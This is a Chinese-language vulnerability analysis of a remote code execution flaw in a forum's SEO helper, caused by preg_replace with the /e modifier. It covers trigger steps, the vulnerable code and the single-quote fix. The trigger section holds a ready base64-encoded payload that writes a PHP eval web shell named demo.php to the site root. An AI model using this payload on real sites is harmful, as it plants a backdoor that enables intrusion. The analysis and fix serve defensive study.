catalog
1. 漏洞描述 2. 漏洞觸發條件 3. 漏洞影響範圍 4. 漏洞程式碼分析 5. 防禦方法 6. 攻防思考
1. 漏洞描述
SEO模組中的preg_replace+修正符e+雙引號引發的遠端程式碼執行漏洞
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2012-06420
2. 漏洞觸發條件
1. 後臺設定,開啟SEO擴充套件 2. 註冊任意賬戶 3. 登陸使用者,發表blog日誌(注意是日誌) 4. 新增圖片,選擇網路圖片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 5. 訪問日誌,論壇根目錄下生成demo.php,一句發密碼c
Relevant Link:
http://weibo.com/2242334800/ygxonqLF9?type=comment#_rnd1432431149028 http://sebug.net/vuldb/ssvid-60082
3. 漏洞影響範圍
4. 漏洞程式碼分析
/source/class/helper/helper_seo.php
.. if($searcharray && $replacearray) { $_G['trunsform_tmp'] = array(); /* 1. 用於替換的$content來自於使用者輸入的圖片地址 2. preg_place替換後的內容使用了雙引號包裹 3. preg_replace的搜尋正則使用了"e"修飾符 導致PHP在完成替換後,會使用eval對替換後的內容進行一次執行,又因為: eval("${${}}")這種語法可以動態執行,最終導致黑客可以遠端程式碼注入 */ $content = preg_replace("/(<script\s+.*?>.*?<\/script>)|(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", 'helper_seo::base64_transform("encode", "<relatedlink>", "\\1\\2\\3\\4", "</relatedlink>")', $content); $content = preg_replace($searcharray, $replacearray, $content, 1); $content = preg_replace("/<relatedlink>(.*?)<\/relatedlink>/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content); } ..
Relevant Link:
http://www.wooyun.org/upload/201204/2620001868555ef2f2153e9b615d32467724d943.jpg
5. 防禦方法
/source/class/helper/helper_seo.php
.. if($searcharray && $replacearray) { $_G['trunsform_tmp'] = array(); /* 修復後將雙引號改為單引號,使動態語法${${}}失去執行能力 */ $content = preg_replace("/(<script\s+.*?>.*?<\/script>)|(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|(\[attach\](\d+)\[\/attach\])/ies", "helper_seo::base64_transform('encode', '<relatedlink>', '\\1\\2\\3\\4', '</relatedlink>')", $content); /* */ $content = preg_replace($searcharray, $replacearray, $content, 1); $content = preg_replace("/<relatedlink>(.*?)<\/relatedlink>/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content); } ..
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved